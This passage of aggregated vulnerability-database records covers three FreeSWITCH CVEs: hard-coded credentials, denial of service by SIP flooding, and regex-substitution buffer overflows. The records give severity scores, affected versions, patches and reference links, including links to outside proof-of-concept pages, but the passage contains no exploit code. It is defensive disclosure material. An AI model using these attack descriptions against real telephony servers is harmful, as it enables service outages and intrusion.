"url": "https://nvd.nist.gov/vuln/detail/cve-2019-19492"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-19492"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021102908"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.3614"
},
{
"trust": 0.6,
"url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-301-01"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/798.html"
},
{
"trust": 0.1,
"url": "https://github.com/chocapikk/cve-2019-19492"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-151944"
},
{
"db": "VULMON",
"id": "CVE-2019-19492"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-013064"
},
{
"db": "NVD",
"id": "CVE-2019-19492"
},
{
"db": "CNNVD",
"id": "CNNVD-201912-010"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-151944"
},
{
"db": "VULMON",
"id": "CVE-2019-19492"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-013064"
},
{
"db": "NVD",
"id": "CVE-2019-19492"
},
{
"db": "CNNVD",
"id": "CNNVD-201912-010"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-12-02T00:00:00",
"db": "VULHUB",
"id": "VHN-151944"
},
{
"date": "2019-12-02T00:00:00",
"db": "VULMON",
"id": "CVE-2019-19492"
},
{
"date": "2019-12-19T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-013064"
},
{
"date": "2019-12-02T02:15:13.910000",
"db": "NVD",
"id": "CVE-2019-19492"
},
{
"date": "2019-12-01T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201912-010"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-12-16T00:00:00",
"db": "VULHUB",
"id": "VHN-151944"
},
{
"date": "2019-12-16T00:00:00",
"db": "VULMON",
"id": "CVE-2019-19492"
},
{
"date": "2019-12-19T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-013064"
},
{
"date": "2019-12-16T20:03:00.240000",
"db": "NVD",
"id": "CVE-2019-19492"
},
{
"date": "2021-11-01T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201912-010"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201912-010"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "FreeSWITCH Vulnerabilities related to the use of hard-coded credentials",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-013064"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "trust management problem",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201912-010"
}
],
"trust": 0.6
}
}
VAR-202110-1542
Vulnerability from variot - Updated: 2023-12-18 13:07FreeSWITCH is a Software Defined Telecom Stack enabling the digital transformation from proprietary telecom switches to a software implementation that runs on any commodity hardware. FreeSWITCH prior to version 1.10.7 is susceptible to Denial of Service via SIP flooding. When flooding FreeSWITCH with SIP messages, it was observed that after a number of seconds the process was killed by the operating system due to memory exhaustion. By abusing this vulnerability, an attacker is able to crash any FreeSWITCH instance by flooding it with SIP messages, leading to Denial of Service. The attack does not require authentication and can be carried out over UDP, TCP or TLS. This issue was patched in version 1.10.7. FreeSWITCH Contains a vulnerability regarding the lack of free memory after expiration.Service operation interruption (DoS) It may be in a state. FreeSWITCH is a set of free and open source communication software developed by the individual developer Anthony Minesale in the United States. The software can be used to create audio, video and short message products and applications
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202110-1542",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "freeswitch",
"scope": "lt",
"trust": 1.0,
"vendor": "freeswitch",
"version": "1.10.7"
},
{
"model": "freeswitch",
"scope": "eq",
"trust": 0.8,
"vendor": "freeswitch",
"version": null
},
{
"model": "freeswitch",
"scope": "eq",
"trust": 0.8,
"vendor": "freeswitch",
"version": "1.10.7"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-013897"
},
{
"db": "NVD",
"id": "CVE-2021-41145"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:freeswitch:freeswitch:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "1.10.7",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2021-41145"
}
]
},
"cve": "CVE-2021-41145",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 5.0,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2021-41145",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "VHN-397864",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:N/I:N/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "security-advisories@github.com",
"availabilityImpact": "HIGH",
"baseScore": 8.6,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"exploitabilityScore": 3.9,
"impactScore": 4.0,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 7.5,
"baseSeverity": "High",
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2021-41145",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2021-41145",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "security-advisories@github.com",
"id": "CVE-2021-41145",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-202110-1765",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-397864",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-397864"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-013897"
},
{
"db": "NVD",
"id": "CVE-2021-41145"
},
{
"db": "NVD",
"id": "CVE-2021-41145"
},
{
"db": "CNNVD",
"id": "CNNVD-202110-1765"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "FreeSWITCH is a Software Defined Telecom Stack enabling the digital transformation from proprietary telecom switches to a software implementation that runs on any commodity hardware. FreeSWITCH prior to version 1.10.7 is susceptible to Denial of Service via SIP flooding. When flooding FreeSWITCH with SIP messages, it was observed that after a number of seconds the process was killed by the operating system due to memory exhaustion. By abusing this vulnerability, an attacker is able to crash any FreeSWITCH instance by flooding it with SIP messages, leading to Denial of Service. The attack does not require authentication and can be carried out over UDP, TCP or TLS. This issue was patched in version 1.10.7. FreeSWITCH Contains a vulnerability regarding the lack of free memory after expiration.Service operation interruption (DoS) It may be in a state. FreeSWITCH is a set of free and open source communication software developed by the individual developer Anthony Minesale in the United States. The software can be used to create audio, video and short message products and applications",
"sources": [
{
"db": "NVD",
"id": "CVE-2021-41145"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-013897"
},
{
"db": "VULHUB",
"id": "VHN-397864"
}
],
"trust": 1.71
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2021-41145",
"trust": 3.3
},
{
"db": "JVNDB",
"id": "JVNDB-2021-013897",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-202110-1765",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "164624",
"trust": 0.7
},
{
"db": "VULHUB",
"id": "VHN-397864",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-397864"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-013897"
},
{
"db": "NVD",
"id": "CVE-2021-41145"
},
{
"db": "CNNVD",
"id": "CNNVD-202110-1765"
}
]
},
"id": "VAR-202110-1542",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-397864"
}
],
"trust": 0.01
},
"last_update_date": "2023-12-18T13:07:00.448000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "FreeSWITCH\u00a0v1.10.7\u00a0Release GitHub",
"trust": 0.8,
"url": "https://github.com/signalwire/freeswitch/releases/tag/v1.10.7"
},
{
"title": "FreeSWITCH Remediation of resource management error vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=167159"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-013897"
},
{
"db": "CNNVD",
"id": "CNNVD-202110-1765"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-401",
"trust": 1.1
},
{
"problemtype": "Lack of memory release after expiration (CWE-401) [NVD evaluation ]",
"trust": 0.8
},
{
"problemtype": "CWE-400",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-397864"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-013897"
},
{
"db": "NVD",
"id": "CVE-2021-41145"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.7,
"url": "https://github.com/signalwire/freeswitch/security/advisories/ghsa-jvpq-23v4-gp3m"
},
{
"trust": 1.7,
"url": "https://github.com/signalwire/freeswitch/releases/tag/v1.10.7"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-41145"
},
{
"trust": 0.6,
"url": "http://seclists.org/fulldisclosure/2021/oct/42"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/164624/freeswitch-1.10.6-sip-flooding-denial-of-service.html"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-397864"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-013897"
},
{
"db": "NVD",
"id": "CVE-2021-41145"
},
{
"db": "CNNVD",
"id": "CNNVD-202110-1765"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-397864"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-013897"
},
{
"db": "NVD",
"id": "CVE-2021-41145"
},
{
"db": "CNNVD",
"id": "CNNVD-202110-1765"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-10-25T00:00:00",
"db": "VULHUB",
"id": "VHN-397864"
},
{
"date": "2022-09-29T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2021-013897"
},
{
"date": "2021-10-25T22:15:07.777000",
"db": "NVD",
"id": "CVE-2021-41145"
},
{
"date": "2021-10-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202110-1765"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2022-08-12T00:00:00",
"db": "VULHUB",
"id": "VHN-397864"
},
{
"date": "2022-09-29T06:31:00",
"db": "JVNDB",
"id": "JVNDB-2021-013897"
},
{
"date": "2022-08-12T14:47:46.377000",
"db": "NVD",
"id": "CVE-2021-41145"
},
{
"date": "2022-08-15T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202110-1765"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202110-1765"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "FreeSWITCH\u00a0 Vulnerability regarding lack of memory release after expiration in",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-013897"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "resource management error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202110-1765"
}
],
"trust": 0.6
}
}
VAR-201309-0138
Vulnerability from variot - Updated: 2023-12-18 12:58Multiple buffer overflows in the switch_perform_substitution function in switch_regex.c in FreeSWITCH 1.2 allow remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via vectors related to the index and substituted variables. FreeSWITCH is prone to multiple buffer-overflow vulnerabilities because the application fails to perform adequate boundary checks on user-supplied input. Successful exploits may allow attackers to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions. FreeSWITCH is a set of free and open source communication software developed by American software developer Anthony Minesale. The software can be used to create audio, video and short message products and applications. A buffer overflow vulnerability exists in the 'switch_perform_substitution' function in the switch_regex.c file in FreeSWITCH version 1.2
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201309-0138",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "freeswitch",
"scope": "eq",
"trust": 2.4,
"vendor": "freeswitch",
"version": "1.2"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-004418"
},
{
"db": "NVD",
"id": "CVE-2013-2238"
},
{
"db": "CNNVD",
"id": "CNNVD-201307-077"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:freeswitch:freeswitch:1.2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2013-2238"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Michael Tokarev",
"sources": [
{
"db": "BID",
"id": "60890"
},
{
"db": "CNNVD",
"id": "CNNVD-201307-077"
}
],
"trust": 0.9
},
"cve": "CVE-2013-2238",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 6.8,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2013-2238",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "VHN-62240",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2013-2238",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201307-077",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-62240",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-62240"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-004418"
},
{
"db": "NVD",
"id": "CVE-2013-2238"
},
{
"db": "CNNVD",
"id": "CNNVD-201307-077"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Multiple buffer overflows in the switch_perform_substitution function in switch_regex.c in FreeSWITCH 1.2 allow remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via vectors related to the index and substituted variables. FreeSWITCH is prone to multiple buffer-overflow vulnerabilities because the application fails to perform adequate boundary checks on user-supplied input. \nSuccessful exploits may allow attackers to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions. FreeSWITCH is a set of free and open source communication software developed by American software developer Anthony Minesale. The software can be used to create audio, video and short message products and applications. A buffer overflow vulnerability exists in the \u0027switch_perform_substitution\u0027 function in the switch_regex.c file in FreeSWITCH version 1.2",
"sources": [
{
"db": "NVD",
"id": "CVE-2013-2238"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-004418"
},
{
"db": "BID",
"id": "60890"
},
{
"db": "VULHUB",
"id": "VHN-62240"
}
],
"trust": 1.98
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2013-2238",
"trust": 2.8
},
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2013/07/04/4",
"trust": 2.5
},
{
"db": "BID",
"id": "60890",
"trust": 1.0
},
{
"db": "JVNDB",
"id": "JVNDB-2013-004418",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201307-077",
"trust": 0.7
},
{
"db": "MLIST",
"id": "[OSS-SECURITY] 20130703 RE: CVE REQUEST: FREESWITCH REGEX SUBSTITUTION 3 BUFFER OVERFLOWS",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-62240",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-62240"
},
{
"db": "BID",
"id": "60890"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-004418"
},
{
"db": "NVD",
"id": "CVE-2013-2238"
},
{
"db": "CNNVD",
"id": "CNNVD-201307-077"
}
]
},
"id": "VAR-201309-0138",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-62240"
}
],
"trust": 0.01
},
"last_update_date": "2023-12-18T12:58:06.607000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "FS-5566",
"trust": 0.8,
"url": "http://jira.freeswitch.org/browse/fs-5566"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-004418"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-119",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-62240"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-004418"
},
{
"db": "NVD",
"id": "CVE-2013-2238"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "http://www.openwall.com/lists/oss-security/2013/07/04/4"
},
{
"trust": 1.7,
"url": "http://jira.freeswitch.org/browse/fs-5566"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-2238"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2013-2238"
},
{
